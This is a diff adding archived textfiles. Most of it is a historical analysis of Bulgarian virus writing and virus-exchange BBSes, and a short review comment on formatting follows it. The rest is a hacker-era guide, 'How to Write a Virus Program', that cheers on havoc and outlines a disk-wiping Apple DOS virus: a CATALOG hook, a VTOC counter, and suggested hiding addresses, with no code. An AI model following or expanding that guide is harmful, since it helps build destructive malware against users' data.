The first step was +the creation of a specialized bulletin board system (BBS), dedicated +to virus exchange. The Virus eXchange BBS. + +It's system operator (SysOp), T.T. is a student of computer science +in the Sofia University. He has established the BBS in his own home. +On this BBS, there are two major kinds of files --- anti--virus +programs and viruses. The anti--virus programs can be downloaded +freely. + +In order to get access to the virus area, one has to upload there a +new virus. However, anyone who uploads a new virus, gets access to +the whole virus collection. S/He could then download every virus that +is already available, or even all of them. No questions are asked --- +for instance for what reason s/he might need these viruses. + +Furthermore, the SysOp takes no steps to verify the identity of his +users. They are allowed to use fake names and are even encouraged to +do so. Dark Avenger and W.T., between them are, the most active +users, but there are also names like George Bush from New York, +Saddam Hussein from Baghdad, Ozzy Ozburn and others. + +Since this BBS has already a large collection of computer viruses +(about 300), it is quite difficult to find a new virus for it. If one +wants badly to get access to the virus area, it is much simpler to +write a new virus, instead of trying to find a new one. That is +exactly what W.T. did. Therefore, this BBS encourages virus writing. + +Furthermore, on this BBS there are all kinds of viruses --- some of +them as 1260, V2P6Z, FLIP, WHALE are considered as extremely +dangerous, since they are using several new ideas and clever tricks, +which makes them very difficult to be recognized and removed from the +infected files. And the Virus eXchange BBS policy makes all these +viruses freely available to any hacker that bothers to download them. +This will, undoubtedly, lead to the creation of more and more such +"difficult" viruses in the near future. 
+ +The free availability of live viruses has already given its bitter +fruits. It helped to viruses created far away from Bulgaria and not +widely spread, to cause epidemics in our country. Such was the case +of the DATALOCK virus. It has been created in California, USA and +uploaded to the Virus eXchange BBS. A few weeks later it was detected +in the Technical University, Sofia. Probably one of the users of the +BBS had downloaded it from there and spread it "for fun." In the +similar way the INTERNAL, TYPO and 1575 viruses entered our country. + +But the free availability of known live viruses is not the most +dangerous thing. After all, since they are already known, there +already exist programs to detect and probably to remove them. Much +more dangerous is the free availability on this BBS of virus source +code! Indeed, original source code or well commented virus +disassemblies of several viruses are freely available on the Virus +eXchange BBS --- just as any other live virus. To name a few, there +are: + +DARK AVENGER, OLD YANKEE, DIAMOND, AMSTRAD, HYMN, MLTI830, MURPHY, +MAGNITOGORSK, ICELANDIC, MIX1, STONED, JERUSALEM, DATACRIME, BURGER, +ARMAGEDON, OROPAX, DARTH VADER, NAUGHTY HACKER, 512, VIENNA, 4096, +FISH#6, PING PONG, BLACK JEC, WWT, MG, TSD, BOOTHORSE, BAD BOY, +LEECH... + +Most of them are perfectly assemblable sources. + +The publishing of virus source code has proven to be the most +dangerous thing in this field. The VIENNA, JERUSALEM, CASCADE and +AMSTRAD viruses are the best examples. Their source code has been +made publicly available, which led to the creation of scores of new +variants of these viruses. The known variants of only these four +viruses are about 20 % of all known viruses, which means more than a +hundred variants. One can imagine the consequences of making publicly +available the source code of all the viruses listed above. In less +than a year we probably will be submerged by thousands new +variants... 
+ +In fact, this process has already begun. The HIV, MIGRAM, KAMASYA, +CEMETERY and ANTICHRIST viruses have been obviously created by +someone who had access to the source of the MURPHY virus. The ENIGMA +virus is clearly based on the OLD YANKEE code. There have been +reports about infections with these viruses in one Italian school and +an Italian virus writer, known as Cracker Jack is a user of Virus +eXchange... + +The damage caused by this BBS alone to the rest of the world is big +enough. But this is not all. Since possession of "viral knowledge" +(i.e., live viruses, virus source code) has always tempted hackers +and since the legitimate anti--virus researchers usually exchange +such things only between themselves and in a very restricted manner, +it is not surprising that similar "virus boards" began to pop up +around the world. There are currently such BBSes in the USA, Germany, +Italy, Sweden, Czechoslovakia, the UK and the Soviet Union. Stopping +their activities is very difficult in legal terms, because the +possession, storage or willful downloading of computer viruses +usually is not considered as a criminal offence. And it shouldn't be +--- otherwise the anti--virus researchers themselves will not have a +way to exchange virus samples to work with. + +The creation of a virus--oriented BBS, the system operator of which +supported the writing, spreading and exchanging of virus code didn't +go unnoticed in Bulgaria. Almost all virus writers have obtained a +modem (a not very easy thing in Bulgaria) and contacted it. +Afterwards, they began to contact each other by means of electronic +messages on this BBS. They have even created a specialized local +conference (local for Bulgaria), in order to keep in touch and to +exchange ideas how to write clever viruses. Therefore, they began to +organize themselves --- a thing that cannot be said about the +anti--virus research community in all countries... + +3) New ideas. 
+============= + +As it can be seen from the examples above, the whole of Bulgaria has +turned into some kind of computer virus developing laboratory, where +any capable (or not so capable) pupil/student/ programmer is tempted +to write his own virus and to test it in the wild. It is not +therefore unusual that several completely new ideas were first +developed in our country. I shall try to enumerate here some (only +the most important) of them. + + +- The interrupt tracing technique, capable of finding the original + handler (in DOS or BIOS) of any interrupt vector, has been first + implemented in the YANKEE DOODLE (TP) viruses. Later other viruses in + the world began to use it (4096, NAUGHTY HACKER). + +- The "fast infectors" --- viruses that infect on file opening or + even on any file operation were first developed in Bulgaria. The + first such virus was the DARK AVENGER. Now there are a lot of fast + infectors. One of them --- 1963 --- even infects on file deletion. + +- The "semi--stealth" viruses --- viruses that hide the increasing of + the size of the infected files (the 651 virus) or that remove them + from the inflected files when one loads them with a debugger (YANKEE + DOODLE) both are viruses, made in our country. + +- Hiding the true file length usually causes problems, because CHKDSK + is able to detect the difference between the disk space marked as + used in the FAT and the reported file length. Only two Bulgarian + viruses in the world are able to handle this problem --- DIAMOND and + V2100. + +- The first really "stealth" file infector --- the 512 virus was + Bulgarian. It is true however, that the idea has been discovered + independently almost at the same time in other parts of the world + (the 4096 virus from Israel). 
+ +- The only known stealth parasitic virus, which "stealthy" features + go down to the BIOS level (i.e., it cannot be detected if active in + memory even if the infected file is read at sector and not at file + level) is the Bulgarian INT13 virus. + +- One of the first multi--partite viruses (viruses that are able to + infect both files and boot sectors) --- the ANTHRAX virus, has been + developed in Bulgaria. It is true, however, that similar ideas can be + noticed in the 4096 and GHOST BALLS viruses, which are developed much + earlier. Also, other multi--partite viruses (VIRUS-101, V-1, FLIP, + INVADER) were created independently almost at the same time (and even + earlier) in other parts of the world. + +- The idea first used in the LEHIGH virus --- to place the virus body + in an unused part of the file COMMAND.COM has been further developed + by several Bulgarian viruses. They all can infect any COM or EXE file + (unlike the LEHIGH virus) in the usual way, but when they are + infecting the command interpreter, they place themselves in an area + filled with zeros at the end of the file and thus in this case they + do not increase its length. Such viruses are TERROR, NAUGHTY HACKER + and others. + +- The method, mentioned above has been developed even further by + other Bulgarian viruses. They have noticed that any sufficiently + large area of zeros in any file (not just COMMAND.COM) can be used to + hide the virus body. The viruses that use this method are again of + Bulgarian origin --- PROUD, EVIL, PHOENIX, RAT, DARTH VADER... The + latter even does not write to the infected files --- it leaves this + task to DOS. And the RAT virus hides itself into the unused part of + the EXE file headers. + +- One of the extremely mutating viruses is the Dark Avenger's virus + LEECH. It can exist in more than 4.5 billion variants. 
It is true, + however, that this is neither the first entirely mutating virus (1260 + being the first), nor it has the most flexible mutating mechanism (it + is much simpler than V2P6Z). + +- A completely new type of computer virus (DIR II) has been developed + by two Bulgarian pupils. This virus does not infect neither files, + nor boot sectors. Instead, it infects file systems as a whole, or + more exactly --- directory entries. + +- Different tricks to get control without directly hooking the INT + 21h vector were developed by several Bulgarian virus writers. The + TERROR virus places a JMP instruction to its body in the original INT + 21h handler in DOS. The viruses from the PHOENIX family ( 800, 1226, + PROUD, EVIL, PHOENIX) hook an interrupt that is called by DOS on + every file--related function (INT 2Ah, AH=82h). The DIR II virus + patches itself in the chain of DOS disk device drivers. + +- The first virus, that is able to infect device drivers (SYS files + only), is, of course, Bulgarian. This is the HAPPY NEW YEAR ( 1600) + virus. + +- The first fully functional parasitic virus, written entirely in a + high level language (Turbo PASCAL) is the Bulgarian virus SENTINEL. + +- The Bulgarian virus ANTHRAX is the first virus that is resident in + memory only temporary. It removes itself from there after it has + infected the first file and then acts as a non--resident virus. + +- The shortest memory resident virus in the IBM PC world --- only 128 + bytes --- is again developed in Bulgaria. There are reports about a + 108--byte resident virus, also from there, but they are unconfirmed + yet. + +- The shortest virus in the IBM PC world --- only 45 bytes long, is + the Bulgarian virus MINIMAL-45. It seems possible, however, to + shorten it even further --- up to 31 bytes, with a big loss of + reliability. + +4) Why so many viruses are created in Bulgaria. 
+=============================================== + +Computer viruses are created in all parts of the world, not only in +Bulgaria. However, the portion of them that are created in our +country is extremely high. Therefore, in the whole world there exist +preconditions that make virus writing tempting, but in Bulgaria there +exist specific conditions as well. + +4.1) Specific reasons for virus writing in Bulgaria. +---------------------------------------------------- + +4.1.1) + +The first, and most important of all is the existence of a +huge army of young and extremely qualified people, computer wizards, +that are not actively involved in the economic life. + +The computerization in Bulgaria began without economical reasons. +Since our country was a socialist one, its economics was of +administrative type. The economics didn't need to be computerized. In +fact, computers and planned economics are quite incompatible --- +computers help you to produce more in less time and with less effort +and money, while the goal of a manager in a planned economics is to +fulfil the plan exactly as it is given --- for no more and no less +time, and with no more and no less money. However, the communist +party leaders in Bulgaria decided that we should computerize --- +mainly to be able to supply computers to the Soviet Union and +circumvent the embargo. + +While computerization in itself is not a bad thing, we made a very +severe mistake. Bulgarian economics was very weak (now it is even +weaker), but we had quite a lot skilled people. Therefore, we should +not have tried to produce hardware while we had good chances in the +software industry, where mainly "brainware" is required. However, +Bulgaria did just the opposite. Instead of buying the hardware, we +began to produce it (mainly illegal Apple and IBM clones). 
Instead of +producing our own software and to try to sell it in the West, we +began to steal Western computer programs, to change some copyright +notices in them, and to re--sell them (mainly in Bulgaria, in the +Soviet Union, and in the other countries of the former Eastern +block). + +At that time most Western software was copy protected. Instead of +training our skilled people in writing their own programs, we began +to train them to break copy protection schemes. And they achieved +great success in this field. The Bulgarian hackers are maybe the best +in cracking copy protected programs. Besides, they had no real hope +in making and selling their own programs, since, due to the total +lack of copyright law on computer software, it was impossible to sell +more than two or three examples of a computer program in Bulgaria. +The rest were copied. + +Since the introduction of computers in the Bulgarian offices was not +a natural process, but due to an administrative order, very often +these computers were not used --- they were only considered as an +object of prestige. Very often on the desk of a company director, +near the phone, stood a personal computer. The director himself +almost never used the computer --- however sometimes his/her children +came to the office to use it --- to play games or to investigate its +internals. While the price of personal computers in Bulgaria was too +high to permit a private person to have his/her own computer, it was +a common practice to use the computer at the office for personal +reasons. At the same time, the computer education was very widely +introduced in Bulgaria. Everyone was educated in this field --- from +children in the kindergartens to old teachers that had just a few +years until pension. Since this kind of science is better +comprehended by younger brains, it is no wonder that the people, who +became most skilled in this field, were very young. Very young and +not morally grown--up. 
We spent a lot of effort teaching these people +how to program, but forgot to educate them in computer ethics. +Besides, the lack of respect to the others' work is a common problem +in the socialist societies. + +4.1.2) + +The second main reason is the wide--spread practice of software +pirating (which was, in fact, a kind of state policy) and the very +low payment of the average programmers. + +As was mentioned above, Bulgaria took the wrong decision in producing +computers and stealing programs. There is still no copyright law, +concerning computer software there. Because of this, the software +piracy was an extremely widespread practice. In fact, almost all +software products used were illegal copies. Most people using them +have never seen the original diskettes or original documentation. +Very often there was no documentation at all. + +Since all kinds of programs (from games to desktop publishing +systems) were copied very often, this greatly helped for the spread +of computer viruses. + +At the same time, the work of the average programmer was evaluated +very low --- there were almost no chances to sell his/her software +products. Even now, a programmer in Bulgaria is paid 100 to 120 times +less than the programmer with the same qualification in the USA. + +This caused several young people to become embittered against the +society that was unable to evaluate them as it should. There is only +one step in the transformation of these young people into creators of +destructive viruses. Some of them (e.g., the Dark Avenger) took this +step. + +4.1.3) + +The third major reason is the total lack of legislative against +creation and willful distribution of computer viruses and against +illegal access and modification of computer information in general. + + +Because of the lack of copyright laws on computer software, there is +no such thing as ownership of computer information in Bulgaria. 
+Therefore, the modification or even the destruction of computer +information is not considered a crime --- since no one's property is +damaged. + +The Bulgarian legislature is hopelessly old in this area. +Furthermore, even if the appropriate law is accepted in the future, +as a punishing law it will not be able to be applied to crimes, +committed before it was passed. Therefore, the virus writers still +have nothing to fear of. + +That is why, the creation of new computer viruses has become some +kind of sport or entertainment in Bulgaria. + +4.1.4) + +The next reason is the very weak organization of the fight against +computer viruses in Bulgaria. Just now our country is in a very deep +economical crisis. We lack funds for everything, including such basic +goods as food and gasoline. At the same time, the organization of the +virus fight would require money --- for the establishment of a +network of virus test centers that collect and investigate computer +viruses, centers equipped with the best hardware, centers that are +able to communicate between themselves and with the other similar +centers in the world in an effective way. Such an effective way is +the electronic mail system --- and Bulgaria still does its first +steps in global computer communications. All this requires a lot of +money --- money that our government just does not have now. 4.1.5) +Another reason is the incorrect opinion, that the society has on the +computer virus problem. + +Still, the victims of a computer virus attack consider themselves as +victims of a bad joke, not as victims of a crime. + +4.1.6) + +The least important reason, in my opinion, is the availability and +the easy access to information of a particular kind. + +All kind of tricks how to fool the operating system circulate among +the Bulgarian hackers. Some of them are often published in the +computer related magazines. 
As it was mentioned above, there is even +a specialized BBS, dedicated to virus spreading and a special (local +to Bulgaria) FidoNet echo, dedicated to virus writing. Not to mention +the well--known file INTERxyy, published by Ralf Brown from the USA +as shareware. It is very popular in Bulgaria, since it contains, +carefully described, a huge number of undocumented tricks. + +However, this is not a very important reason. Usually those, who have +decided to make a virus already know how to do it, or, at least, can +figure it out by themselves. They do not need to take an existing +virus and to modify it. The proof is the prevalence of original +Bulgarian viruses over the variants of known ones, as well as the +fact, that many new ideas for virus writing were first invented and +implemented in Bulgaria. + +4.2) General reasons. +--------------------- + +Since viruses are also created in all the other parts of the world, +there should be also some general reasons for this. These reasons +are, of course, valid for Bulgaria too. Let's see these general +reasons. + +4.2.1) Wish for glory. + +Every programmer dreams that his/her program gets widely spread and +used. A lot of very good programmers write and distribute wonderful +software packages for free --- with the only intention to have more +users using their package. However, for a program to be used, it has +to be good enough. And not every programmer is able to make a program +so good that the users will widely use it --- even for free. At the +same time, computer viruses do spread very widely, regardless and +even against the users' will. So, when a virus writer reads in a +newspaper that his virus has been discovered at the other end of the +world, he feels some kind of perverted pleasure. Some people write +viruses just to see their names (or the names of their viruses) +published in the newspapers. This reason has yet another aspect. 
In +the beginning of the virus era, when the idea of the computer virus +was very new, only the very good programmers were able to make a +virus. It became a common myth that if you can write a virus, you're +a great programmer. This myth might have been justified at the +beginning, but now it is completely without sense. Nevertheless, +young hackers began to write viruses --- just to prove to their +friends and to the rest of the world how good programmers they are. +Some of them were really unable to invent something original --- +that's why they just picked a known virus, modified it a bit and +released this new mutation. This explains why there are so many +variants of the simplest viruses that were first created --- BRAIN, +JERUSALEM, STONED, VIENNA, CASCADE... A typical example is the +Italian virus writer, who calls himself Cracker Jack. + +4.2.2) Simple human curiosity. + +One has to admit that the idea of a computer program that is able to +spread by its own means, to replicate, to hide from the user (who is +believed to maintain the computer under full control), and in general +to behave as a real live being is really fascinating. Just simple +human curiosity is sufficient to make some people, if they are young +and irresponsible enough, to try to make a computer virus. Some of +them do succeed. A greater and greater part, if we consider the +amount of last reports for new viruses. Some of them claim that they +are writing viruses "only for themselves," "only for fun," and that +"they do not spread them." However, it is often impossible to fully +control the spread of a "successful" computer virus. The more clever +these viruses are, the greater the probability that they will +"escape." There is an idea to teach students how viruses are made --- +of course in a very strongly restricted environment. Maybe at least +for some this will fulfil their curiosity and they will not be +tempted to write their own virus. 
Maybe if we force every computer +science student to learn Dr. Fred Cohen's theorems on the +computational aspects of computer viruses, if we administer an exam +and ask students to design a virus protection scheme or to help a +cluster of users, attacked by a computer virus for a course work --- +well, maybe in this case these students will have more than enough of +the computer virus problem and will not want to hear about it any +more --- least to make their own viruses. 4.2.3) Easy access to +information. + +Sufficient information, needed to write a virus can be found easily. +This information is often even more accessible than in Bulgaria. + +The person that wants to write an average virus needs only to dig in +the respective manuals --- manuals, which are often not available in +Bulgaria. However, the usefulness of the easy access to this +information is much greater than the damage, caused by the fact that +it is used by the virus writers. + +4.2.4) Military interests. + +It is often rumoured that the superpowers are working on the problem +how to use computer viruses to destroy the enemy computers' software. +It is even very probable, that in several countries such research is +performed. There are reports on this from the USA, France and the +USSR. + +This is no wonder --- it is the right of every military force to +investigate any new idea and to consider the possible usefulness +and/or threats it might bring to the national defense. However, it is +quite improbable that the computer viruses can be used for this +purpose. Just like the live viruses, the computer ones are able to +spread only among individuals with very similar immunotype, i.e. --- +among compatible computers. The most widely used kinds of personal +computers are the IBM PC, Macintosh, Amiga and Atari ST. It is +therefore no wonder that the vast majority of existing computer +viruses are able to infect only these computers. 
In the same time, +viruses that infect one kind of computer (say, IBM PC), are unable to +spread (or even to run) on another (e.g., a Macintosh). They are +usually not able to run even on two different operating systems in +one and the same computer. Even a different version of the same +operating system might cause big problems to a particular computer +virus --- up to preventing it to work. The common personal computers +are never assigned important tasks in the army. Therefore, even if a +virus infects them, and even if it destroys all the data on all such +computers, the caused damage will not be of great importance. +Computers that are used for the really important things, such as +rocket leading or cannon aiming, are always specialized ones. Their +programs are usually hard--coded and only data can be entered in +them. It is not possible to insert an infected IBM PC diskette in the +computers that control the NORAD system. At the same time, the +computers that control different important devices are usually +incompatible even between themselves. Therefore, even if someone +writes a virus for a specialized rocket computer, this virus will not +be able to infect the computers of a strategic bomber or even these +of a rocket of a different system. So, such virus will not spread +very much. And last, but not least, such virus has to be placed +somehow in the enemy's computers. Since, as we saw above, it won't be +able to spread from one computer to another of a different kind, +obviously someone has to insert it in the victim computer. But if you +have access to the enemy's computers, you don't need a virus. You can +do the same task easier (and often much better) "manually", or with a +Trojan horse or a logic bomb. 4..2.5) Corporate interests. + +It is also often speculated that the large software companies and the +producers of anti--virus software make or willfully spread computer +viruses. + +There is some reason behind this. 
Indeed the fear of viruses can make +the user buy only original software (sometimes --- quite expensive), +and not to use pirated copies, shareware or freeware. At the same +time, companies that produce anti--virus software are interested that +their products are sold. And they will be, if the user needs +anti--virus protection. However, it is rather improbable, that a +software company (whether producing or not anti--virus software) will +take the risk to become known that it willfully spreads viruses. It +will be probably boycotted by its users and the losses of income will +be much greater than any gains. As to the producers of anti--virus +software, they don't need to write viruses themselves, in order to +sell their programs. It is sufficient to use the hype that the media +accords to the problem, to mention how many viruses there are and how +many of them their wonderful product is able to defeat. + +5) The Soviet virus factory and virus writing in the other countries +===================================================================== + of the former Eastern block. + ============================ + +While Bulgaria was one of the best computerized countries in East +Europe, the political, economical, and social conditions in the other +countries were (and maybe still are) quite similar. That is why the +virus writing and spreading has been developed in these countries +too. + +Viruses are created in Poland ( W13, 217, 583, FATHER CHRISTMAS, DOT +EATER, JOKER, VCOMM, AKUKU, 311, HYBRYD), in Hungary ( STONE `90, +FILLER, MONXLA, POLIMER, TURBO KUKAC), in Czechoslovakia (the +AANTIVIRUS virus), and even in Yugoslavia ( 17Y4, SVIR). According to +some reports from Romania, there are no viruses written there, but +the W13, YANKEE DOODLE, DARK AVENGER and StONED viruses are quite +widespread. + +However, the country most similar to Bulgaria is, undoubtedly, the +Soviet Union. 
According to the Soviet anti--virus researcher Bezrukov +[Bezrukov], the first virus appeared there almost at the same time as +in Bulgaria and, by the way, it was the same virus ( VIENNA). So, the +preconditions are almost the same as with our country. + +There are, however, two main differences: the level of +computerization and the number of virus writers. + +The level of computerization is still much lower than in Bulgaria. +There are much fewer computers per person than in our country. The +users are much more isolated, due to the much larger distances. The +telephone network is in the same miserable condition, as in Bulgaria. +The networks are very few and not widely used. For instance, in Sofia +alone there are more FidoNet nodes than in the whole Soviet Union. It +is not safe to send floppy disks by regular mail, since they will be +probably stolen. All this delays very much the spreading of viruses. +Unfortunately, it also delays the distribution of anti--virus +products and the information exchange between the anti--virus +researchers. For instance, examples of new viruses created there +reach the Western anti--virus researchers with huge delays. +Unfortunately, the other factor is much more dangerous. In the USSR +there are much more programmers than in Bulgaria and they seem at +least as much motivated in creating new viruses. The virus writing in +the Soviet Union is currently in the same state as it was in Bulgaria +about three years ago. However, at that time only nine variants of +known viruses and one stupid original virus has been created there (6 +VIENNA variants, 3 AMSTRAD variants, and the OLD YANKEE virus). At +the first Soviet anti--virus conference in Kiev (mid--November, 1990) +more than 35 different viruses of Russian origin were reported. + +Some of them were variants of known viruses, while others were +completely new. 
It has been noticed that the Soviet virus writers are +less qualified than the Bulgarian ones, but they use a destructive +payload in their creations much more often. + +Since the reasons of virus writing in the USSR are very similar to +those in Bulgaria; since this virus writing occurs in a much larger +scale; and since no steps are taken by the authorities in order to +stop it, it is possible to predict that in the next few years the +Soviet Union will be far ahead of Bulgaria in computer virus creation +and that a new, much larger wave of computer viruses will come from +there. Probably after a year, several (up to ten) virus writers with +the qualification of the Dark Avenger will emerge from there. + +6) The impact of the Bulgarian viruses on the West and on the national +====================================================================== + software industry. + ================== + +While a huge part of the existing viruses are +produced in Bulgaria, a relatively very small part of them spread +successfully to the West. Of more than 160 Bulgarian viruses, only +very few ( DARK AVENGER, V2000, V2100, PHOENIX, DIAMOND, +NOMENKLATURA, VACSINA, YANKEE DOODLE) are relatively widespread. At +the same time some of them ( DARK AVENGER, V2000, YANKEE DOODLE, +VACSINA) are extremely widespread. According to John McAfee, about 10 +% of all infections in the USA are caused by Bulgarian viruses --- +usually by the DARK AVENGER virus. In West Europe this virus shares +the popularity with YANKEE DOODLE and VACSINA. + +Of the viruses listed above, the major part are written by the Dark +Avenger --- all except YANKEE DOODLE and VACSINA. Almost all his +viruses (in this case --- with the exception of DIAMOND, which is the +least spread) are extremely destructive. The PHOENIX and NOMENKLATURA +viruses corrupt the FAT in such a subtle way, that when the user +notices the damage, there is no way to disinfect the infected files +and even to determine which files are damaged. 
The only way is to +reformat the hard disk. + +It is difficult to estimate the costs of all damage caused by +Bulgarian viruses. There are reports from Germany about a 10,000,000 +DM damage, caused only by the VACSINA virus. It is probable, however, +that these numbers are largely overestimated. + +The huge number of known Bulgarian viruses causes also indirect +damage to the West community, even if the viruses themselves do not +escape from Bulgaria, but only examples of them are supplied to the +anti--virus researchers. These researchers have to develop +anti--virus programs against these viruses (just in case the latter +succeed to spread outside Bulgaria). Therefore, they have to waste +their time and efforts. Furthermore, the user is forced to buy new +anti--virus programs (or pay for updates of the old ones), in order +to feel safe against these viruses. In the same time, the creation +and spreading of Bulgarian viruses causes a lot of damage to the +Bulgarian economics. In Bulgaria, the Bulgarian viruses are much more +widespread. More than 80 % of about 160 known Bulgarian viruses have +been detected in the wild in our country. It is difficult, however, +to evaluate, or even to estimate the exact costs of the caused +damage, since in Bulgaria the term "property of computer information" +simply does not exist in legal sense. It is the same with the cost of +this information. In fact, the creation of computer viruses causes +also indirect damage to our economics. First of all, a lot of +extremely capable people are wasting their minds to create +destructive viruses, instead of something useful. Second, the fact +that the Bulgarian programmers use their time to create computer +viruses destroys their reputation as a whole. No serious software +company accepts to deal with Bulgarian programmers or software +companies, because it is afraid that the supplied software might be +pirated or might contain a virus. 7) Conclusion. 
Virus writing in +Bulgaria is an extremely widespread hobby. Most of the major virus +writers are known, but no measures can be taken against them. Their +work causes a lot of damage to the Western community, as well as to +the national economics. Therefore, it is urgent to take legal +measures in this direction; measures that will make virus writing and +willful spread of computer viruses a criminal act. This is the only +way to stop, or at least to reduce the threat. + +References +========== + +[KV88] Viruses in Memory, Komputar za vas, 4--5, 1988, pp.12--13 (in +Bulgarian) + +[KV89] The Truth about Computer Viruses, Vesselin Bontchev, Komputar +za vas, 1--2, 1989, pp. 5--6 (in Bulgarian) + +[Chip] Die neue Gefahr --- Computerviren, Steffen Wernery, Chip, 9, +1987, pp. 34--37 (in German) + +[Bezrukov] Computer Virology, Nikolay Nikolaevitch Bezrukov, Kiev, +1991, ISBN 5-88500-931-X (in Russian) + + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/catvir.txt b/textfiles.com/virus/catvir.txt new file mode 100644 index 00000000..7dd57bf2 --- /dev/null +++ b/textfiles.com/virus/catvir.txt 
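Review bot: several section headings in this hunk appear to have lost their line structure on import, and should be checked against the upstream textfiles.com copy before merging. "4.2.3) Easy access to information." and "4..2.5) Corporate interests." run directly on from the preceding paragraph instead of standing on their own line (the second also has a doubled dot), "7) Conclusion." is glued to the end of the paragraph before it with no "=====" rule like the other numbered headings have, and the heading for section 5 is split into two separately underlined fragments ("5) The Soviet virus factory ..." and " of the former Eastern block."). If a byte-for-byte mirror is intended these stay as they are in the source, but a `diff` against the original download would confirm which of them are genuine and which were introduced by the import; the trailing "Downloaded From P-80 International Information Systems" footer gives the provenance to compare against.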
@@ -0,0 +1,148 @@ + + +From -- + + + + + ____________________________________________________________________________ +/ \ +| HOW TO WRITE A VIRUS PROGRAM | +| by | +| The Cheshire Cat | +\ / + !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + + For people who have nothing else to do but cause unprecidented havoc + on other peoples systems, this is something you should read. To begin + with, I'd like to explain briefly to the ignorant readers of this, what + exactly a virus program is. A virus program is in the genre of tapeworm, + leech, and other such nasty programs. I will show clearly, one possible + application of it, on an Apple system, and I will demonstrate how easily + this little pest could lead to wiping out most of someone's important + disks. Here we go! + + One day, while I had little else to do, I was reading an computing + article in some obscure science magazine. As it happened, the article + discussed a growing problem in the computer community about the danger + of virus programs. Someone quoted in the article said that they wrote + a very simple virus program and put it on the univerisity computer as + a test. All the program did was look through the computers memory, + and devices (tape drives, hard drives, etc...) for stored programs, and + when it found one, it would search through the program for itself. If + it didn't find anything, it would find an empty spot in the program, and + implant itself. This may not sound too exciting, but this little program + was actually part of another program (maybe a word processor, or spread- + sheet, or maybe even zaxxon) and whenever someone ran that program, and + executed the little virus stuck inside it, the virus would stop program + execution (for a time period that even us humans wouldn't notice) and do + its little job of infecting other programs with itself. 
This example + of a virus was harmless, but even so, after only 4 hours the whole system + had to be shutdown and the whole memory core dumped because the virus had + begun to fill up too much space and it was using up all the mainframe's + time. I don't think it would have been so easy if this professor had + just done this experiment on his own and had not got permission or told + anyone about it. Think of the havoc!! + Well, that has taken up too much time discussing already, so I'll + add only one more thing before we get down to business, that REAL + viruses are extemely BAD. They usually are designed as time bombs that + start erasing disks, memory, and maybe even backups or the operating + system after they have been run so many times, or after a certain date + is reached. Someone did this to a bank one time (and by the way he was + never caught!) He was given the task of designing their operating system + and security, and he decided he wasn't getting paid enough, so he devised + his own method of compensation. Every so often, the computer would steal + a certain amount of money from the bank (by just CREATING it electronic- + ally) and would put it in an account that didn't exist as far as the bank + or the IRS or anybody knew, and whenever this guy wanted, he went to + the bank and withdrew some money. They aren't sure how he did it, but + he probably visited the electronic teller as often as possible. As I + said, the authorities still haven't found him, but after several years + of his leech program being in service, it "expired." They assume that + he set it up to destroy itself after so long, and when this little + program was gone, the bank suddenly was missing several million dollars. + Now, I wouldn't recommend doing this sort of thing, but then again, who + said crime doesn't pay? + Now to discuss the application of this to a Personal Computer is + very simple. 
When I decided to do this, I figured it would be easiest + to stick my program in the DOS, so that I would always know where to put + another copy of my virus while it was reproducing itself, and that it + would be easier to explain why the disk drive is running when it starts + to initialize your disks. For those who have a copy of Beneath Apple DOS + it would be easy to find the space to put in the program. If you don't, + I tell you a few places that are not used (or where you can put it and + it won't be noticed) but I'd recommend getting the book anyways - it's + an excellent tool for doing these sort of things, and useful even if you + don't. As suggestions for where to put it (if you choose to infect DOS), + you could use BCDF-BCFF which is still unused, or BFD9-BFFF, which WAS + unused, but has since been used in updates of DOS. Likewise, I would + also suggest using space taken up by junk like LOCK or UNLOCK commands. + Who the hell ever uses them? Think about it, when was the last time you + used the lock command? Get real. If you don't like that, how about + MAXFILES. I've only used that in a program once in my entire life. I + know people who couldn't even tell you what it does. That would make me + feel safe about sticking a virus there. + But now comes the part that will be harder for the inexperienced, + but easier as long as you know what you're doing. By the way, you've + been TOTALLY wasting your time reading this if you don't understand + assembly, because you HAVE TO in order to accomplish a task such as this. + But, don't fret, you could insert a little BASIC code into some dumb + utility (like an program whose only function is to initialize disks) that + would put itself on the disk, as it initializes it (probably as the hello + program) and would work from that aspect. Of course, it would be easier + for a less experienced person to detect, but who really cares! + As I was saying, however, you now have to write the code. 
If you + work in an area where you are limited memorywise (like I did) it can get + tough at times. The only way I got through it was by referring to + documented listings of all of DOS that I got somewhere, and using bits + and pieces of routines from other things as much as I could. When I + was done, I had a copy of DOS that when it was booted into the computer, + would work completely properly (except for maybe some bizarre circum- + stances that I didn't bother testing for), but when someone CATALOGed a + disk, it did a few different things. It would first load up the VTOC as + usual, but then it would jump to MY routine. In this instance, it was + very easy to use the VTOC which contains many unused bytes to house my + counter. I would increment it, check if it was time to destroy the disk, + and then execute an INIT, or just save the VTOC. Then it would save + three more sectors to the disk. One was the place where DOS branched to + my routines, the others were my actual routine. And thus was born a + virus. I guarentee that if anyone has experienced a problem with their + disks, it was not my fault because I have not yet implemented the virus. + No one has pissed me off enough to warrant its use. Even worse is the + fact that it could backfire (after being distributed across the country, + I don't doubt I'd end up with it also) because not only was it very well + planned, but you don't even notice any sort of a pause. The virus + executes itself so fast that there is little more than a microsecond of + a pause while the catalog is going on. I tried comparing it to a normal + catalog, and found I couldn't tell the difference. The only way this + thing wouldn't work is if the disk it was cataloging wasn't DOS 3.3, and + if that happened, it would probably screw the disk anyways. I know + there are people who will abuse this knowledge, so you may wonder why I + even bothered writing it. 
